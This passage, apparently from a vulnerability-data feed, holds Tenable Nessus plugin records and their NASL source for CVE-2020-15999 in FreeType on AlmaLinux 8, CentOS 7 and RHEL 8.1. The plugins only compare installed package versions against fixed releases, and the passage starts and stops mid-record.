>!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'AlmaLinux', cpu);\n\nvar pkgs = [\n {'reference':'freetype-2.9.1-4.el8_3.1', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'freetype-2.9.1-4.el8_3.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'freetype-devel-2.9.1-4.el8_3.1', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'freetype-devel-2.9.1-4.el8_3.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'Alma-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release && (!exists_check || rpm_exists(release:release, rpm:exists_check))) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'freetype / freetype-devel');\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:41:38", "description": "The remote CentOS Linux 7 host has packages installed that are affected by a vulnerability as referenced in the CESA-2020:4907 advisory.\n\n - freetype: Heap-based buffer overflow due to integer truncation in Load_SBit_Png (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-11-06T00:00:00", "type": "nessus", "title": "CentOS 7 : freetype (CESA-2020:4907)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:centos:centos:freetype", "p-cpe:/a:centos:centos:freetype-demos", "p-cpe:/a:centos:centos:freetype-devel", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2020-4907.NASL", "href": "https://www.tenable.com/plugins/nessus/142598", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:4907 and\n# CentOS Errata and Security Advisory 2020:4907 respectively.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142598);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"RHSA\", value:\"2020:4907\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"CentOS 7 : freetype (CESA-2020:4907)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 7 host has packages installed that are affected by a vulnerability as referenced in the\nCESA-2020:4907 advisory.\n\n - freetype: Heap-based buffer overflow due to integer truncation in Load_SBit_Png (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://lists.centos.org/pipermail/centos-cr-announce/2020-November/012870.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b8ccc74c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/122.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/190.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected freetype, freetype-demos and / or freetype-devel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-15999\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(122, 190);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:freetype-demos\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:freetype-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/CentOS/release');\nif (isnull(release) || 'CentOS' >!< release) audit(AUDIT_OS_NOT, 'CentOS');\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'CentOS 7.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\npkgs = [\n {'reference':'freetype-2.8-14.el7_9.1', 'sp':'9', 'cpu':'i686', 'release':'CentOS-7'},\n {'reference':'freetype-2.8-14.el7_9.1', 'sp':'9', 'cpu':'x86_64', 'release':'CentOS-7'},\n {'reference':'freetype-demos-2.8-14.el7_9.1', 'sp':'9', 'cpu':'x86_64', 'release':'CentOS-7'},\n {'reference':'freetype-devel-2.8-14.el7_9.1', 'sp':'9', 'cpu':'i686', 'release':'CentOS-7'},\n {'reference':'freetype-devel-2.8-14.el7_9.1', 'sp':'9', 'cpu':'x86_64', 'release':'CentOS-7'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'freetype / freetype-demos / freetype-devel');\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:40:39", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2020:4950 advisory.\n\n - freetype: Heap-based buffer overflow due to integer truncation in Load_SBit_Png (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-11-05T00:00:00", "type": "nessus", "title": "RHEL 8 : freetype (RHSA-2020:4950)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:redhat:rhel_e4s:8.1", "cpe:/o:redhat:rhel_eus:8.1", "p-cpe:/a:redhat:enterprise_linux:freetype", "p-cpe:/a:redhat:enterprise_linux:freetype-devel"], "id": "REDHAT-RHSA-2020-4950.NASL", "href": "https://www.tenable.com/plugins/nessus/142470", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:4950. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142470);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"RHSA\", value:\"2020:4950\");\n script_xref(name:\"IAVA\", value:\"2020-A-0486-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"RHEL 8 : freetype (RHSA-2020:4950)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2020:4950 advisory.\n\n - freetype: Heap-based buffer overflow due to integer truncation in Load_SBit_Png (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/122.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/190.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-15999\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:4950\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1890210\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected freetype and / or freetype-devel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-15999\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(122, 190);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freetype-devel\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nvar os_ver = os_ver[1];\nif (!rhel_check_release(operator: 'eq', os_version: os_ver, rhel_version: '8.1')) audit(AUDIT_OS_NOT, 'Red Hat 8.1', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar repositories = {\n 'rhel_e4s_8_1_appstream': [\n 'rhel-8-for-x86_64-appstream-e4s-debug-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-debug-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-appstream-e4s-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-appstream-e4s-source-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-source-rpms__8_DOT_1'\n ],\n 'rhel_e4s_8_1_baseos': [\n 'rhel-8-for-x86_64-baseos-e4s-debug-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-debug-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-e4s-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-e4s-source-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-source-rpms__8_DOT_1'\n ],\n 'rhel_e4s_8_1_highavailability': [\n 'rhel-8-for-x86_64-highavailability-e4s-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-debug-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-highavailability-e4s-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-highavailability-e4s-source-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-source-rpms__8_DOT_1'\n ],\n 'rhel_e4s_8_1_sap': [\n 'rhel-8-for-x86_64-sap-netweaver-e4s-debug-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-debug-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-source-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-source-rpms__8_DOT_1'\n ],\n 'rhel_e4s_8_1_sap_hana': [\n 'rhel-8-for-x86_64-sap-solutions-e4s-debug-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-debug-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-sap-solutions-e4s-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-sap-solutions-e4s-source-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-source-rpms__8_DOT_1'\n ],\n 'rhel_eus_8_1_appstream': [\n 'rhel-8-for-aarch64-appstream-eus-debug-rpms',\n 'rhel-8-for-aarch64-appstream-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-aarch64-appstream-eus-rpms',\n 'rhel-8-for-aarch64-appstream-eus-rpms__8_DOT_1',\n 'rhel-8-for-aarch64-appstream-eus-source-rpms',\n 'rhel-8-for-aarch64-appstream-eus-source-rpms__8_DOT_1',\n 'rhel-8-for-s390x-appstream-eus-debug-rpms',\n 'rhel-8-for-s390x-appstream-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-s390x-appstream-eus-rpms',\n 'rhel-8-for-s390x-appstream-eus-rpms__8_DOT_1',\n 'rhel-8-for-s390x-appstream-eus-source-rpms',\n 'rhel-8-for-s390x-appstream-eus-source-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-appstream-e4s-debug-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-source-rpms',\n 'rhel-8-for-x86_64-appstream-eus-debug-rpms',\n 'rhel-8-for-x86_64-appstream-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-appstream-eus-rpms',\n 'rhel-8-for-x86_64-appstream-eus-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-appstream-eus-source-rpms',\n 'rhel-8-for-x86_64-appstream-eus-source-rpms__8_DOT_1'\n ],\n 'rhel_eus_8_1_baseos': [\n 'rhel-8-for-aarch64-baseos-eus-debug-rpms',\n 'rhel-8-for-aarch64-baseos-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-aarch64-baseos-eus-rpms',\n 'rhel-8-for-aarch64-baseos-eus-rpms__8_DOT_1',\n 'rhel-8-for-aarch64-baseos-eus-source-rpms',\n 'rhel-8-for-aarch64-baseos-eus-source-rpms__8_DOT_1',\n 'rhel-8-for-s390x-baseos-eus-debug-rpms',\n 'rhel-8-for-s390x-baseos-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-s390x-baseos-eus-rpms',\n 'rhel-8-for-s390x-baseos-eus-rpms__8_DOT_1',\n 'rhel-8-for-s390x-baseos-eus-source-rpms',\n 'rhel-8-for-s390x-baseos-eus-source-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-e4s-debug-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-source-rpms',\n 'rhel-8-for-x86_64-baseos-eus-debug-rpms',\n 'rhel-8-for-x86_64-baseos-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-eus-rpms',\n 'rhel-8-for-x86_64-baseos-eus-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-eus-source-rpms',\n 'rhel-8-for-x86_64-baseos-eus-source-rpms__8_DOT_1'\n ],\n 'rhel_eus_8_1_crb': [\n 'codeready-builder-for-rhel-8-aarch64-eus-debug-rpms',\n 'codeready-builder-for-rhel-8-aarch64-eus-debug-rpms__8_DOT_1',\n 'codeready-builder-for-rhel-8-aarch64-eus-rpms',\n 'codeready-builder-for-rhel-8-aarch64-eus-rpms__8_DOT_1',\n 'codeready-builder-for-rhel-8-aarch64-eus-source-rpms',\n 'codeready-builder-for-rhel-8-aarch64-eus-source-rpms__8_DOT_1',\n 'codeready-builder-for-rhel-8-s390x-eus-debug-rpms',\n 'codeready-builder-for-rhel-8-s390x-eus-debug-rpms__8_DOT_1',\n 'codeready-builder-for-rhel-8-s390x-eus-rpms',\n 'codeready-builder-for-rhel-8-s390x-eus-rpms__8_DOT_1',\n 'codeready-builder-for-rhel-8-s390x-eus-source-rpms',\n 'codeready-builder-for-rhel-8-s390x-eus-source-rpms__8_DOT_1',\n 'codeready-builder-for-rhel-8-x86_64-eus-debug-rpms',\n 'codeready-builder-for-rhel-8-x86_64-eus-debug-rpms__8_DOT_1',\n 'codeready-builder-for-rhel-8-x86_64-eus-rpms',\n 'codeready-builder-for-rhel-8-x86_64-eus-rpms__8_DOT_1',\n 'codeready-builder-for-rhel-8-x86_64-eus-source-rpms',\n 'codeready-builder-for-rhel-8-x86_64-eus-source-rpms__8_DOT_1'\n ],\n 'rhel_eus_8_1_highavailability': [\n 'rhel-8-for-aarch64-highavailability-eus-debug-rpms',\n 'rhel-8-for-aarch64-highavailability-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-aarch64-highavailability-eus-rpms',\n 'rhel-8-for-aarch64-highavailability-eus-rpms__8_DOT_1',\n 'rhel-8-for-aarch64-highavailability-eus-source-rpms',\n 'rhel-8-for-aarch64-highavailability-eus-source-rpms__8_DOT_1',\n 'rhel-8-for-s390x-highavailability-eus-debug-rpms',\n 'rhel-8-for-s390x-highavailability-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-s390x-highavailability-eus-rpms',\n 'rhel-8-for-s390x-highavailability-eus-rpms__8_DOT_1',\n 'rhel-8-for-s390x-highavailability-eus-source-rpms',\n 'rhel-8-for-s390x-highavailability-eus-source-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-highavailability-e4s-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-source-rpms',\n 'rhel-8-for-x86_64-highavailability-eus-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-highavailability-eus-rpms',\n 'rhel-8-for-x86_64-highavailability-eus-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-highavailability-eus-source-rpms',\n 'rhel-8-for-x86_64-highavailability-eus-source-rpms__8_DOT_1'\n ],\n 'rhel_eus_8_1_resilientstorage': [\n 'rhel-8-for-s390x-resilientstorage-eus-debug-rpms',\n 'rhel-8-for-s390x-resilientstorage-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-s390x-resilientstorage-eus-rpms',\n 'rhel-8-for-s390x-resilientstorage-eus-rpms__8_DOT_1',\n 'rhel-8-for-s390x-resilientstorage-eus-source-rpms',\n 'rhel-8-for-s390x-resilientstorage-eus-source-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-resilientstorage-eus-debug-rpms',\n 'rhel-8-for-x86_64-resilientstorage-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-resilientstorage-eus-rpms',\n 'rhel-8-for-x86_64-resilientstorage-eus-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-resilientstorage-eus-source-rpms',\n 'rhel-8-for-x86_64-resilientstorage-eus-source-rpms__8_DOT_1'\n ],\n 'rhel_eus_8_1_sap': [\n 'rhel-8-for-s390x-sap-netweaver-eus-debug-rpms',\n 'rhel-8-for-s390x-sap-netweaver-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-s390x-sap-netweaver-eus-rpms',\n 'rhel-8-for-s390x-sap-netweaver-eus-rpms__8_DOT_1',\n 'rhel-8-for-s390x-sap-netweaver-eus-source-rpms',\n 'rhel-8-for-s390x-sap-netweaver-eus-source-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-debug-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-source-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-eus-debug-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-sap-netweaver-eus-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-eus-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-sap-netweaver-eus-source-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-eus-source-rpms__8_DOT_1'\n ],\n 'rhel_eus_8_1_sap_hana': [\n 'rhel-8-for-x86_64-sap-solutions-e4s-debug-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-source-rpms',\n 'rhel-8-for-x86_64-sap-solutions-eus-debug-rpms',\n 'rhel-8-for-x86_64-sap-solutions-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-sap-solutions-eus-rpms',\n 'rhel-8-for-x86_64-sap-solutions-eus-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-sap-solutions-eus-source-rpms',\n 'rhel-8-for-x86_64-sap-solutions-eus-source-rpms__8_DOT_1'\n ],\n 'rhel_eus_8_1_supplementary': [\n 'rhel-8-for-aarch64-supplementary-eus-rpms',\n 'rhel-8-for-aarch64-supplementary-eus-rpms__8_DOT_1',\n 'rhel-8-for-aarch64-supplementary-eus-source-rpms',\n 'rhel-8-for-aarch64-supplementary-eus-source-rpms__8_DOT_1',\n 'rhel-8-for-s390x-supplementary-eus-rpms',\n 'rhel-8-for-s390x-supplementary-eus-rpms__8_DOT_1',\n 'rhel-8-for-s390x-supplementary-eus-source-rpms',\n 'rhel-8-for-s390x-supplementary-eus-source-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-supplementary-eus-rpms',\n 'rhel-8-for-x86_64-supplementary-eus-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-supplementary-eus-source-rpms',\n 'rhel-8-for-x86_64-supplementary-eus-source-rpms__8_DOT_1'\n ]\n};\n\nvar repo_sets = rhel_get_valid_repo_sets(repositories:repositories);\nif(repo_sets == RHEL_REPOS_NO_OVERLAP_MESSAGE) audit(AUDIT_PACKAGE_LIST_MISSING, RHEL_REPO_AUDIT_PACKAGE_LIST_DETAILS);\n\nvar pkgs = [\n {'reference':'freetype-2.9.1-4.el8_1.1', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_e4s_8_1_baseos', 'rhel_e4s_8_1_highavailability', 'rhel_e4s_8_1_sap', 'rhel_e4s_8_1_sap_hana', 'rhel_eus_8_1_appstream', 'rhel_eus_8_1_baseos', 'rhel_eus_8_1_crb', 'rhel_eus_8_1_highavailability', 'rhel_eus_8_1_resilientstorage', 'rhel_eus_8_1_sap', 'rhel_eus_8_1_sap_hana', 'rhel_eus_8_1_supplementary']},\n {'reference':'freetype-2.9.1-4.el8_1.1', 'sp':'1', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_e4s_8_1_baseos', 'rhel_e4s_8_1_highavailability', 'rhel_e4s_8_1_sap', 'rhel_e4s_8_1_sap_hana', 'rhel_eus_8_1_appstream', 'rhel_eus_8_1_baseos', 'rhel_eus_8_1_crb', 'rhel_eus_8_1_highavailability', 'rhel_eus_8_1_resilientstorage', 'rhel_eus_8_1_sap', 'rhel_eus_8_1_sap_hana', 'rhel_eus_8_1_supplementary']},\n {'reference':'freetype-2.9.1-4.el8_1.1', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 